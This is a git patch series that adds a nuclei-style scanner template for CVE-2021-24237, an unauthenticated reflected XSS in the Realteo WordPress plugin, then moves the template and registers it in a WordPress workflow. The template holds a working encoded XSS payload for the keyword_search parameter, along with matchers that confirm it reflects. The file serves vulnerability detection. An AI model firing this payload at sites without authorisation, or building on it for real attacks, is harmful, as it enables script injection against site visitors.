From 67d60d0f2a1542b1da71e9366837a52b6b9262ec Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Wed, 9 Jun 2021 20:11:17 +0900
Subject: [PATCH 1/3] Create CVE-2021-24237.yaml

---
 CVE-2021-24237.yaml | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 CVE-2021-24237.yaml

diff --git a/CVE-2021-24237.yaml b/CVE-2021-24237.yaml
new file mode 100644
index 00000000000..845fffe6407
--- /dev/null
+++ b/CVE-2021-24237.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-24237
+
+info:
+  author: 0x_Akoko
+  name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
+  description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
+  severity: medium
+  tags: cve,cve2021,realteo,xss,wordpress
+  reference: |
+      - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
+      - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "autofocus onfocus=alert(/{{randstr}}/);//"
+          - "Nothing found"
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

From 3779eb70e0f078a323bd7a86ecebc9e23b16dad8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Fri, 11 Jun 2021 16:48:05 +0530
Subject: [PATCH 2/3] Moved template to cves folder

---
 CVE-2021-24237.yaml => cves/2021/CVE-2021-24237.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename CVE-2021-24237.yaml => cves/2021/CVE-2021-24237.yaml (100%)

diff --git a/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml
similarity index 100%
rename from CVE-2021-24237.yaml
rename to cves/2021/CVE-2021-24237.yaml

From 418e84dac4d0c715e050cc2a2a4befe13a711434 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Wed, 16 Jun 2021 01:55:41 +0530
Subject: [PATCH 3/3] Updated workflow

---
 workflows/wordpress-workflow.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index 667e3da0a23..def0fb8c87c 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -31,6 +31,7 @@ workflows:
           - template: cves/2020/CVE-2020-35951.yaml
           - template: cves/2020/CVE-2020-35489.yaml
           - template: cves/2021/CVE-2021-24146.yaml
+          - template: cves/2021/CVE-2021-24237.yaml
           - template: cves/2021/CVE-2021-24176.yaml
           - template: cves/2021/CVE-2021-24285.yaml
           - template: cves/2021/CVE-2021-24316.yaml